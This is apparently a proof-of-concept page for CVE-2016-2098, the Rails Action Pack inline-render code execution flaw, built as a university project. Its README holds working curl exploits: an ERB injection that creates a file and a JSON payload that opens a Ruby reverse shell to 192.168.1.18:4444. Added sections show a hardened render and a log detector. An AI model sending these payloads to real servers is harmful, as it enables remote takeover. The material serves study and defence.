
CVE-2016-2098 PoC — Ruby on Rails Action Pack Security Vulnerability

Source
Associated Vulnerability
Title: Ruby on Rails Action Pack Security Vulnerability (CVE-2016-2098)
Description: Ruby on Rails (Rails) is an open-source web application framework written in Ruby and developed and maintained by the Rails core team; it was extracted by David Heinemeier Hansson from Basecamp, the project-management tool of the US company 37signals. Action Pack is one of its components, used for building and testing MVC web applications. A security vulnerability exists in Action Pack of Ruby on Rails; it stems from the 'render' function not adequately filtering user-submitted input. A remote attacker can exploit this vulnerability to execute arbitrary Ruby code by sending specially crafted data to the application. The following versions are affected: Rub
Description
Proof of concept CVE-2016-2098
Readme
# A Proof of Concept of vulnerability: CVE-2016-2098

University project created by @alejandro-marting
where we can check the vulnerability CVE-2016-2098

Using:
* rails 4.2.5.1
* the vulnerable code is in the view app/views/poc/render1.html.erb
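
The view described above hands request parameters straight to `render`, which is the shape of CVE-2016-2098: a `template[inline]` parameter arrives as a Hash with an `inline` key, and Rails compiles that value as ERB. The following Ruby example is added here and is not code from the PoC repository; it simulates the pattern with plain `ERB` instead of the Rails view layer, and the names `render_unsafe`, `render_safe`, `TEMPLATES`, `INJECTED` and `BENIGN` are assumptions chosen for illustration. It shows the vulnerable form beside a hardened form that only accepts an allow-listed template name.

```ruby
require "erb"

# Constructed stand-in for a handful of on-disk templates; in a Rails app these
# would be files under app/views/ (names chosen for illustration only).
TEMPLATES = {
  "welcome" => "Hello, <%= name %>!",
  "goodbye" => "Bye, <%= name %>!"
}.freeze

# Mimics the dangerous shape behind CVE-2016-2098: the caller passes render
# options taken straight from the request parameters. A Hash carrying an
# "inline" key is treated as ERB source and compiled, so whoever built the
# request chooses the Ruby code that runs.
def render_unsafe(options, name: "guest")
  if options.is_a?(Hash) && options.key?("inline")
    ERB.new(options["inline"]).result(binding)
  else
    ERB.new(TEMPLATES.fetch(options.to_s)).result(binding)
  end
end

class UnknownTemplate < StandardError; end

# Hardened form: only a template *name* may come from the request, and it must
# be one of the known templates. Hashes (and therefore "inline") never reach ERB,
# and path-like names are rejected because they are not in the allow list.
def render_safe(template_param, name: "guest")
  raise UnknownTemplate, "render options must be a template name" unless template_param.is_a?(String)
  source = TEMPLATES[template_param] or raise UnknownTemplate, "unknown template #{template_param.inspect}"
  ERB.new(source).result(binding)
end

# Constructed request parameters: the shape Rails builds from
# ?template[inline]=... (INJECTED) and from ?template=welcome (BENIGN).
INJECTED = { "template" => { "inline" => "<%= 6 * 7 %>" } }.freeze
BENIGN   = { "template" => "welcome" }.freeze

if __FILE__ == $0
  puts render_unsafe(INJECTED["template"])          # request-chosen ERB runs: 42
  puts render_safe(BENIGN["template"], name: "Ann") # Hello, Ann!
  begin
    render_safe(INJECTED["template"])
  rescue UnknownTemplate => e
    puts "rejected: #{e.message}"
  end
end
```

The fix that matters is not escaping the ERB source but never letting a user-controlled Hash reach `render` at all; in a real Rails controller the equivalent is to look the parameter up in a fixed map of template names and call `render` with the literal result.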

![](https://github.com/Alejandro-MartinG/rails-PoC-CVE-2016-2098/blob/master/app/assets/images/Captura%20de%20pantalla%20de%202017-01-15%2009:50:23.png)

## Execution:
First we need to run the Rails server with the following command:

```
$ rvmsudo rails server -b 0.0.0.0 -p 80
```

Now we can trigger the remote code execution with the following command:

```
$ curl 'localhost:3000/poc/render1?template\[inline\]=<%25%3DFileUtils.touch+"rooted"%25>'
```

(A file named `rooted` should be generated.)

If you want to try a reverse shell via Ruby code injection, you can run the
following command:
```
$ curl -H "Content-type: application/json" -X GET -d ' {"template" : {
"inline" : "<%= require \'socket\';exit if
fork;c=TCPSocket.new(\"192.168.1.18\",\"4444\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print
io.read}end %>"}}'  http://localhost:3000/poc/render1
```

If you have any questions, please contact me!
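
From the defender's side, the two requests shown in this README share one detectable shape: a render-related parameter that carries a nested `inline` key, or a value containing ERB markers (`<%`). The Ruby example below is added here and is not part of the PoC repository; it flags that shape both in access-log query strings and in JSON bodies. The `parse_query` helper is a constructed one-level simplification of Rack's nested-parameter parsing, the log lines in `SAMPLE_LOG` are constructed (the second one carries the query string from the curl command above), and the function names are assumptions.

```ruby
require "uri"
require "json"

# Turn "template[inline]=...&x=1" into a nested Hash, the way Rack does for one
# level of brackets (constructed simplification; Rack handles deeper nesting).
def parse_query(query)
  URI.decode_www_form(query.to_s).each_with_object({}) do |(key, value), params|
    if (m = key.match(/\A(\w+)\[(\w+)\]\z/))
      (params[m[1]] ||= {})[m[2]] = value
    else
      params[key] = value
    end
  end
end

# Walk a params structure (from a query string or a JSON body) and return the
# dotted path of every key named "inline" and of every string value that looks
# like ERB source. Either one is the signature of the request shape this PoC uses.
def erb_injection_paths(params, path = [])
  found = []
  case params
  when Hash
    params.each do |k, v|
      found << (path + [k]).join(".") if k.to_s == "inline"
      found.concat(erb_injection_paths(v, path + [k]))
    end
  when Array
    params.each_with_index { |v, i| found.concat(erb_injection_paths(v, path + [i])) }
  when String
    found << path.join(".") if params.include?("<%")
  end
  found.uniq
end

# Constructed access-log lines in combined-log shape. Only the second line is
# malicious; it carries the query string from the README's curl command.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [15/Jan/2017:09:50:23 +0100] "GET /poc/render1?template=welcome HTTP/1.1" 200 512
  10.0.0.9 - - [15/Jan/2017:09:51:02 +0100] "GET /poc/render1?template[inline]=<%25%3DFileUtils.touch+"rooted"%25> HTTP/1.1" 200 12
  10.0.0.9 - - [15/Jan/2017:09:51:40 +0100] "GET /poc/render1 HTTP/1.1" 200 12
LOG

# Return [line, flagged_paths] for every log line whose query string carries
# the injection signature. Lines without a query string are skipped.
def flag_log_lines(log)
  log.each_line.each_with_object([]) do |line, hits|
    m = line.match(/"(?:GET|POST) \S+\?(\S+) HTTP/) or next
    paths = erb_injection_paths(parse_query(m[1]))
    hits << [line.strip, paths] unless paths.empty?
  end
end

# Same check for a JSON request body, which never shows up in an access log.
def flag_json_body(body)
  erb_injection_paths(JSON.parse(body))
end

if __FILE__ == $0
  flag_log_lines(SAMPLE_LOG).each { |line, paths| puts "#{paths.join(',')}: #{line}" }
  puts flag_json_body('{"template":{"inline":"<%= 6 * 7 %>"}}').inspect
end
```

The JSON variant of the request is invisible to access logs, which only record the request line; for that case the same walk has to run inside the application (for example over the parsed params in a Rack middleware or a `before_action`), where the body has already been decoded.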
File Snapshot

```
[4.0K] /data/pocs/2fdb9e9db758301e24cdcba4a6a0c1db4f63a0d9
├── [4.0K] app
│   ├── [4.0K] assets
│   │   ├── [4.0K] images
│   │   │   ├── [128K] Captura de pantalla de 2017-01-15 09:50:23.png
│   │   │   └── [ 18K] logo.png
│   │   ├── [4.0K] javascripts
│   │   │   ├── [ 661] application.js
│   │   │   ├── [ 211] poc.coffee
│   │   │   └── [ 211] welcome.coffee
│   │   └── [4.0K] stylesheets
│   │       ├── [ 686] application.css
│   │       ├── [ 174] poc.scss
│   │       └── [ 178] welcome.scss
│   ├── [4.0K] controllers
│   │   ├── [ 204] application_controller.rb
│   │   ├── [4.0K] concerns
│   │   ├── [ 68] poc_controller.rb
│   │   └── [ 52] welcome_controller.rb
│   ├── [4.0K] helpers
│   │   ├── [ 29] application_helper.rb
│   │   ├── [ 21] poc_helper.rb
│   │   └── [ 25] welcome_helper.rb
│   ├── [4.0K] mailers
│   ├── [4.0K] models
│   │   └── [4.0K] concerns
│   └── [4.0K] views
│       ├── [4.0K] layouts
│       │   └── [ 311] application.html.erb
│       ├── [4.0K] poc
│       │   ├── [ 101] render1.html.erb
│       │   └── [ 10] _template1.html.erb
│       └── [4.0K] welcome
│           └── [1.0K] index.html.erb
├── [4.0K] bin
│   ├── [ 129] bundle
│   ├── [ 268] rails
│   ├── [ 213] rake
│   ├── [ 805] setup
│   └── [ 488] spring
├── [4.0K] config
│   ├── [1.4K] application.rb
│   ├── [ 132] boot.rb
│   ├── [ 552] database.yml
│   ├── [ 150] environment.rb
│   ├── [4.0K] environments
│   │   ├── [1.6K] development.rb
│   │   ├── [3.2K] production.rb
│   │   └── [1.7K] test.rb
│   ├── [4.0K] initializers
│   │   ├── [ 486] assets.rb
│   │   ├── [ 404] backtrace_silencers.rb
│   │   ├── [ 129] cookies_serializer.rb
│   │   ├── [ 194] filter_parameter_logging.rb
│   │   ├── [ 647] inflections.rb
│   │   ├── [ 156] mime_types.rb
│   │   ├── [ 157] session_store.rb
│   │   └── [ 517] wrap_parameters.rb
│   ├── [4.0K] locales
│   │   └── [ 634] en.yml
│   ├── [1.6K] routes.rb
│   └── [ 964] secrets.yml
├── [ 153] config.ru
├── [ 565] data_log
├── [4.0K] db
│   ├── [ 0] development.sqlite3
│   └── [ 343] seeds.rb
├── [1.5K] Gemfile
├── [4.1K] Gemfile.lock
├── [4.0K] lib
│   ├── [4.0K] assets
│   └── [4.0K] tasks
├── [4.0K] log
│   └── [ 91K] development.log
├── [4.0K] public
│   ├── [1.5K] 404.html
│   ├── [1.5K] 422.html
│   ├── [1.4K] 500.html
│   ├── [ 0] favicon.ico
│   └── [ 202] robots.txt
├── [ 249] Rakefile
├── [1.1K] README.md
├── [4.0K] tmp
│   └── [4.0K] cache
│       └── [4.0K] assets
│           └── [4.0K] sprockets
│               └── [4.0K] v3.0
│                   ├── [4.0K] _0
│                   │   └── [1.1K] _0wjgrLtFD2GoEt2xvgMT8gVPhuhFy5CrWYUfJN7gOk.cache
│                   ├── [4.0K] 04
│                   │   └── [ 86K] 04F1M8YB2Dw2f5lZwZ92J6EwZ6KcGkL0tMoxa38AwuQ.cache
│                   ├── [4.0K] 0U
│                   │   └── [ 159] 0UE_37X-uaPNJ2FguYalR20D4mhXBFbqacEwz0-blIA.cache
│                   ├── [4.0K] 1-
│                   │   └── [1.1K] 1-EBaTKRQyOjHxT6_ZmRf8dceo-eodWnDxGBY22pLjY.cache
│                   ├── [4.0K] 1Z
│                   │   └── [6.9K] 1ZsXsp9b3fNmx0b3rVwyplnpE9Ek4UOshXeSGiVY_AE.cache
│                   ├── [4.0K] 38
│                   │   └── [ 218] 386fTXSSGVwOIucP7NQZ2yqMl0x22mQWQn2rLkdZeDM.cache
│                   ├── [4.0K] 42
│                   │   └── [2.0K] 42mwsLe6WOJYsQQguPOe6szdcY1pBXgLcf_wuOXHnUA.cache
│                   ├── [4.0K] 48
│                   │   └── [ 297] 48T13KvD09AS3y7QQcSGB47VoQ0fxgGYF39Mq1JEQ5U.cache
│                   ├── [4.0K] 4e
│                   │   └── [ 847] 4eoE--ka895ZHqKLRmAfxqeJNUWSNLdDhmpWkARAQMA.cache
│                   ├── [4.0K] 4K
│                   │   └── [ 36] 4K41QHnRfADWv3PO_eWT47-eSA9BXqs-Q_8JGffuKhw.cache
│                   ├── [4.0K] 4R
│                   │   └── [ 145] 4R3WJ-nw4EpKuFEu3xJmPEco1rEJ12wXcb655MrxCms.cache
│                   ├── [4.0K] 52
│                   │   └── [ 98K] 52mhaFaBVCdfNhfL3K8HhqmU5DtR5HwWtj8FsGbf5Po.cache
│                   ├── [4.0K] 5c
│                   │   └── [ 255] 5cWmSbE2lOmA2_-6ZfmlX2Lh4PaR6dkYoW3dxjzpNlk.cache
│                   ├── [4.0K] 5L
│                   │   └── [ 930] 5Lly_CA8DZvPhQV2jDQx-Y6P_y3Ygra9t5jfSlGhHDA.cache
│                   ├── [4.0K] 5P
│                   │   └── [2.0K] 5PcHPOoux9crrbxb75iZDv1vGhHzXgSPYumkMd7VycA.cache
│                   ├── [4.0K] 6c
│                   │   └── [ 146] 6c1rCFNVNth-3gbg1VfqpD973givaFDpQQP5noj4-lQ.cache
│                   ├── [4.0K] 6Y
│                   │   └── [ 36] 6YGSLH1AtEXv65-vtJqvAI7_edmfjVoyF32z6AQyliA.cache
│                   ├── [4.0K] 7I
│                   │   └── [ 146] 7I9W_k655hdMCEAk6_IJB8DcrzmTEcy-SrBvFvtUCEM.cache
│                   ├── [4.0K] 8C
│                   │   └── [1.9K] 8CGemgX70mRcPjIFlRg1x3fL6vExjNU8sQ25Ns_oy7o.cache
│                   ├── [4.0K] 8g
│                   │   └── [ 138] 8gvyw0yEEwKK4mAuhtWQUJYrJ5ivpc-eCbzPmCp03WA.cache
│                   ├── [4.0K] 8q
│                   │   └── [ 223] 8qrg-w7zRe_bV83S0dGx0jx6NG3K6SnBwVBcTTjJdvY.cache
│                   ├── [4.0K] 96
│                   │   └── [ 159] 96f_Qo1xYBdKTPVNwgZ5KcaIEAGLtRgCoE5vgP6Oi-w.cache
│                   ├── [4.0K] A-
│                   │   └── [ 36] A-Iv8W9h_tqdR7FnTa0RYKyHQ_w1snd0jQh0lFxszOw.cache
│                   ├── [4.0K] Al
│                   │   └── [ 36] Al0n8NLoyu4mXhGTCypwT2r1e2FGd1AchShAS8dL0wc.cache
│                   ├── [4.0K] AP
│                   │   └── [ 477] APY89OAPJx9A3D3xcCoktvEvQUs7NcWChYXnjjjPzz0.cache
│                   ├── [4.0K] ax
│                   │   └── [ 130] axhaNLBezm2sQhvGvOZPtMeVNE6fEV7XZgzO4fZRAxg.cache
│                   ├── [4.0K] B_
│                   │   └── [ 36] B_DDzqXo8KG9dkRw2DO75Oo69emZBkfWuLfdIo2kyWw.cache
│                   ├── [4.0K] B6
│                   │   └── [ 98K] B6F7q51M9Y1IaKfPzYhF8hyMcgUSN9wORaPYxJKerjo.cache
│                   ├── [4.0K] B8
│                   │   └── [ 36] B8K7A1dortUufioQo0cX7MfX-VKmC6crZVykUwwKVOo.cache
│                   ├── [4.0K] BA
│                   │   └── [ 36] BAM7esBP22vk8nHS-PRTPMVvZsnnFvPfBLArsEZoCfg.cache
│                   ├── [4.0K] cC
│                   │   └── [ 227] cCWzACoMLbHAWSqc96Q-QZAgsVtE-jxVEZ49bMdxAxc.cache
│                   ├── [4.0K] cD
│                   │   └── [ 159] cDIHP2JaACOtgw0ge9TSpYq0dqXWr_gSBm5JN5x3ooI.cache
│                   ├── [4.0K] cr
│                   │   └── [ 154] crTRN4bh_daYQUTa0bXo-E6uTHRwwo386A0CW5bzPKs.cache
│                   ├── [4.0K] dn
│                   │   └── [ 192] dndzzava103PP8FPkGBNWn37GIoNOQn6HSl-acLEj1s.cache
│                   ├── [4.0K] ds
│                   │   └── [ 98K] dsLzodIPAowHmJKgsvb0Fm5--_tRwqln5nK5kVHWIdY.cache
│                   ├── [4.0K] DS
│                   │   └── [ 960] DSOLSc6A5RVSmvM415eEWAWG_AgOvZcLZOXQjsXyWQA.cache
│                   ├── [4.0K] dT
│                   │   └── [ 36] dT11Svr8I-APBcuiShc32k7UWOwwyV186CvXXdOP1Aw.cache
│                   ├── [4.0K] EB
│                   │   └── [ 522] EBtbhweQl74JQNkwFL3ahZH_9x44ceqa9hOT8lQ_SfM.cache
│                   ├── [4.0K] ee
│                   │   └── [ 41] ee9ZqYM3D8GORlAyhQhVVtyNcEArBAXuuAcPhnfTNT8.cache
│                   ├── [4.0K] Fl
│                   │   └── [1.1K] FlTwDWNYtmicNCaUVmkDqC7TwafHAB3UEaEatAmmi4g.cache
│                   ├── [4.0K] fp
│                   │   └── [ 36] fpkUKQRlEqwWDEjbDcY6zPJltuE8xhfiHWxpA51sYO0.cache
│                   ├── [4.0K] gH
│                   │   └── [ 36] gHz1DX4XzQVSdHhS2QPpRmwx8ueQrluJM4PN6q3c-kU.cache
│                   ├── [4.0K] GH
│                   │   └── [1.1K] GHjq1_XWeHLZd26ki0xRhtWR2dx8Co26QDiwpEfDyTQ.cache
│                   ├── [4.0K] Gl
│                   │   └── [ 36] GlTkFg6BN1qfxNqSQnRWGotNj2jeuHWkcZCldZsQ_Ms.cache
│                   ├── [4.0K] GM
│                   │   └── [ 98K] GMuHKJc-v_dmoJm7oNjVosQ77Zl3JaifdHwPnmIqmpA.cache
│                   ├── [4.0K] gx
│                   │   └── [ 301] gx4JBuwLryMYfm_VSni_gVanepbWrgVM9LphCChGmko.cache
│                   ├── [4.0K] Hw
│                   │   └── [ 36] Hw5qGNhksX_pK88gnrW2Dakxdyp9Pvx4aHQPROB0DtQ.cache
│                   ├── [4.0K] i1
│                   │   └── [ 144] i1Qjfnr8cWhxb9cUFx3x1DGlk5u484rNVsWwmoojg-4.cache
│                   ├── [4.0K] I9
│                   │   └── [ 259] I9Ji3hKbhOCXCg5Or8mdoK35rCPPZCSeNUUiuHJ176w.cache
│                   ├── [4.0K] iK
│                   │   └── [ 158] iKUs4Xwpny9WyjwuXgPrHCreKdksTOJC-blZtkxdjiY.cache
│                   ├── [4.0K] IN
│                   │   └── [ 158] INfZdihFpQjdJwZla_DPh99iZGHea3y0xW9QY8eEcsU.cache
│                   ├── [4.0K] J4
│                   │   └── [ 36] J4IfCuP3GMHjPnhatD_HJZ7p2P1_QabtrDWh7y1dsCA.cache
│                   ├── [4.0K] JA
│                   │   └── [ 145] JASo9VYYFHvQva697AvavkLcbppMY_nLoxtv_0kXDPA.cache
│                   ├── [4.0K] jc
│                   │   └── [ 867] jcqxOrNEEpBL-bao_lXwPAPiD1nQHsik4mcmKUDdSLQ.cache
│                   ├── [4.0K] jn
│                   │   └── [ 130] jnBeUWz0iNoN_Cw9uOnRt88Ekp8AYQTsDCPNSGHrUW0.cache
│                   ├── [4.0K] Jq
│                   │   └── [ 36] JqwhoilmIih3U92QWNRcB_g80O2lGffr65vC4KXomT8.cache
│                   ├── [4.0K] KP
│                   │   └── [ 144] KPftm_rwGZDbgVSWxwYn2DeQJZyNMKHAJYtTbH-nFjg.cache
│                   ├── [4.0K] kS
│                   │   └── [ 518] kSkCWaAJCcTgZ_AhrRCjZhNtkE12cubiq70uNtditqk.cache
│                   ├── [4.0K] lg
│                   │   ├── [ 319] lgAe9IWoXhDolaHO5mQbRZbBFZC4ZX6K9jlI3C2QqxM.cache
│                   │   └── [ 36] lgcHS8h-b5rsPGnFplY30NfHrqqKaqaBV_0DTUhV2IM.cache
│                   ├── [4.0K] Ml
│                   │   └── [ 36] MlDqN-gkOEucNup7a0_wZElc7Y4KzKcYxIAqWYoBIAg.cache
│                   ├── [4.0K] MZ
│                   │   └── [1.1K] MZ7oeg_1Q12pvRh8KHWJt_OOH-548RvXnUwsgaop7wk.cache
│                   ├── [4.0K] nJ
│                   │   └── [ 707] nJ7IXdsb4hI-IPKjCnGSoQ9CgFT5xerKKqJq-NUSnw8.cache
│                   ├── [4.0K] -O
│                   │   └── [ 941] -O3psbkHndP1O1uSSfDNsklOM9mU1WlvuyOKiCt5irY.cache
│                   ├── [4.0K] OI
│                   │   └── [ 670] OI6uxGcnsKavdWTtwDAasU3wPx8QXhzBgV0X2n1KjMQ.cache
│                   ├── [4.0K] OR
│                   │   └── [ 98K] OR4aX6EXsjsqR-j4d3e8d90kKt9CH2DxuBuPeUGU_b0.cache
│                   ├── [4.0K] P_
│                   │   └── [ 36] P_cTRidr6Gw5BBRUKY23l0XUdAifxibEWwGvSsoSwGk.cache
│                   ├── [4.0K] pF
│                   │   └── [ 158] pFzpQxoCmRxceEFBplhVKBlVn2q-wTTLaosw1pAaVZ0.cache
│                   ├── [4.0K] pg
│                   │   └── [6.1K] pgNfrjk3wkfaP9GrSfifKCUmICKYzfXj81RNOzuTgN8.cache
│                   ├── [4.0K] qc
│                   │   └── [ 142] qcylLXqLcS1qfx2Lb7Rupi720rTU9g83FL6gXe9gpFc.cache
│                   ├── [4.0K] qf
│                   │   └── [ 961] qfLlG3Q03FFD-Xcly7mor9GdAVhSHRFTW3pCjsd9FP0.cache
│                   ├── [4.0K] qs
│                   │   └── [2.2K] qs8lodpAL78PLrxu15_6FPwpN2fbGpg7SVTvf6I43yg.cache
│                   ├── [4.0K] _r
│                   │   └── [ 158] _rAeX9VEUK-DPCkXexVU4UfhVQ9PAT3ZvdXyu3RBzxc.cache
│                   ├── [4.0K] Rl
│                   │   └── [2.2K] RlA7BgvmiZJTJe_z6Ws3d2SeSdIULRA3bNXO1Jr9atw.cache
│                   ├── [4.0K] ru
│                   │   └── [ 36] ru8CAmzoE9YT2k5Qj7QCfvLJITqYP0HwTTQcqggHpAs.cache
│                   ├── [4.0K] Su
│                   │   └── [6.3K] SuhtC6f7E2-1SXl4bkRvOKqhzFKTjPvbglVtjbjV6WQ.cache
│                   ├── [4.0K] Ti
│                   │   └── [ 36] TitFLiZLjQ1QIHkCi8rOL5VB12w3mhOa6iAC4Wr7zvc.cache
│                   ├── [4.0K] VF
│                   │   └── [ 212] VFAdBdVwb_rZPOeO7H4uco-IKs2GuiuEbXxViBkQixA.cache
│                   ├── [4.0K] -x
│                   │   └── [ 144] -xJE7Qdv-klqvoisr-iuqkooxmEGYWYBQcCec9Qlpzk.cache
│                   ├── [4.0K] xc
│                   │   └── [ 36] xc4ppc_7iT9THgcnRSMFowndIf6yiCJqZLAVCExoIAE.cache
│                   ├── [4.0K] Xt
│                   │   └── [ 216] XthS8k_5jkb5QdymES6MX4bdSS3923q5Bxxg2viq-ng.cache
│                   ├── [4.0K] Ym
│                   │   └── [ 98K] YmT4R6M4SC1-H5jnucBHXDzfZzYsFnXH_Mn1Um8_nLA.cache
│                   ├── [4.0K] Yq
│                   │   └── [ 119] Yq4pzVaKuQZLeUsmsZcmPS8nqnT8r9lOd4CRv472pTg.cache
│                   └── [4.0K] yx
│                       └── [1.7K] yxoSBUdKeiyBR4A1uyLJMnDHvFLQ3Lqy-NXuo4K0bfc.cache
└── [4.0K] vendor
    └── [4.0K] assets
        ├── [4.0K] javascripts
        └── [4.0K] stylesheets

118 directories, 139 files
```